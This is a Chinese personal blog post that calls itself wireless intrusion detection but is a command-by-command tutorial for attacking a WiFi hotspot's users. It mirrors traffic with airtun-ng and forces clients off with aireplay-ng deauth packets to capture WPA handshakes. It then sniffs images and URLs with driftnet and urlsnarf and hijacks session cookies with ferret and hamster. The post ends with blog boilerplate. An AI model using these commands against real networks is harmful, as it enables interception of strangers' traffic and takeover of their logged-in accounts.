wIDS无线入侵检测

字数:328字 | 预计阅读时长:1分钟
一 、原理粗谈

使用 Airtun-NG 将无线热点下的所有流量镜像到一个虚拟接口下,监听此虚拟接口便可嗅探数据包,发现敏感信息。

二 、创建虚拟接口

  1. 开启网卡

    ifconfig wlan0 up

  2. 开启网卡监听模式

    airmon-ng start wlan0

  3. 创建虚拟接口

1
airtun-ng -a B4:C4:FC:65:77:50 -p 88888888 -e test wlan0mon

  • -a:bssid

  • -p:wifi密码

  • -e:wifi名字

    由上图知,此时已经创建一个名叫”at0”的虚拟接口。

  1. 开启此虚拟接口

    ifconfig at0 up

三 、抓取握手包

发送deauth包让客户端断开重连,方便我们抓取到握手包

1
aireplay-ng -0 15 -a <bssid> -c <客户端mac地址> <监听模式的网卡>

当出现WPA handshake 表示已经抓取到握手包

四、抓包嗅探
  1. 此时所有流量都会被镜像到at0接口,我们对at0接口进行抓包

可看到此热点下的所有数据包

  1. 嗅探图片

    1
    driftnet -i at0 -a -d /root/图片/

  1. 嗅探URL

    urlsnarf -i at0

  2. 抓取cookie

    将wireshark抓到的数据包保存后缀为pcap的格式,使用ferret解包

    1
    ferret -r test.pcap

    打开hamster,监听在本地的1234端口

    浏览器设置好代理 127.0.0.1:1234

    地址栏输入hamster

谢谢你请我吃糖果

微信

扫一扫,分享到微信

微信分享二维码
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

作者是一个极其低调,而又不失内涵的人。 <br> 只因年少轻狂,不知少壮不努力,老大徒伤悲之意,错失高考。 <br> 至此,以“学到老,活到老”,树立终生学习之观念。 <br> 所谓好记性不如烂笔头,我将所学技术记载于此博客。 <br> 此博客就当作是我的学习笔记。 <br> 方便日后复习总结。 <br> 转眼,光阴数十载, <br> 本人已踏入老男人之行列。 <br> 深夜流泪, <br> 往日不堪回首。 <br> 时至今日, <br> 往事已去。 <br> 目光向前, <br> 不负余生。